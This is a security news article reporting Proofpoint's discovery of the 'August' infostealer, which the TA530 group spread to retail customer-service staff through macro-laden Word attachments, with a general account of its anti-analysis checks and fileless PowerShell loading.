During the month of November 2016, a cyber-crime group has started deploying a new malware family nicknamed "August," used mainly for information gathering and reconnaissance on the infected target's computer.
The crooks have used August in highly-targeted spear-phishing attacks, aimed at the customer service and managerial staff at various retailers, according to US security firm Proofpoint, who first uncovered the attacks and the August malware.
This technique of targeting customer support representatives has also been observed in the past month by security researchers from Trustwave, who reported seeing the Carbanak malware gang using the same method to infect two companies in the hospitality field and a restaurant chain.
According to Proofpoint, behind the August malware stands a long-lived and experienced cyber-crime group tracked by the TA530 codename.
This threat actor has been extremely busy in the past year, targeting high-level execs with very targeted spear-phishing emails, usually put together using data gathered from LinkedIn and other sources.
Now the group has started shipping the August malware, which is nothing more than a mundane infostealer, but a newly created threat.
For their campaign, TA530 has been using spam email disguised as customer complaints. Some of the email subject lines allude to errors in orders, which require customer support reps to investigate the issue, who often end up opening the file attachments they receive with the email. Some of the cleverely-crafted subject lines are:
A sample of the email customers receive is also embedded below.
In all cases, the attached file is a Word document that contains a malicious macro. Analysis of this file by Proofpoint researchers showed that the macro script, if allowed to execute by the tricked victim, would execute a PowerShell script that downloads and "filelessly" loads the malware into the victim's computer memory, without saving anything on disk.
The August malware, despite being a low-level first-stage infostealer, uses some very advanced anti-detection techniques, some of which were discovered only in the past three months.
The list of anti-detection techniques includes the malware's ability to scan and search for recently opened files, local process counts, task names, and queries for the victim's IP address via the Maxmind IP-to-geolocation API.
The role of these checks is to detect if the malware runs inside a virtual machine or a real computer. If the scans find fewer than three files opened, very few local processes, task names hinting at reverse engineering tools, or IPs associated with well-known data centers, the malware aborts execution, coming to the conclusion that a researcher is trying to analyze it.
If these checks turn out OK, the August infostealer would spring into action, and carry out a series of actions that include:
All this data is sent to a remote command and control (C&C) server. This data is accessible to TA530 group members using a Web-based control panel. Proofpoint researcher have managed to gain access to one of these panels, portrayed below.
While August is a relatively new threat, the infostealer shows the same grade of sophistication and rich features you see from more mature threats, such as Pony, Snifula, or CoreBot.
Its use of PowerShell for malicious purposes is also in line with a Symantec report released today that discovered that 95.4% of 111 malware families employed Microsoft's PowerShell scripting language for malicious operations, such as downloading other malware, malware modules, or for traversing a network for other precious information.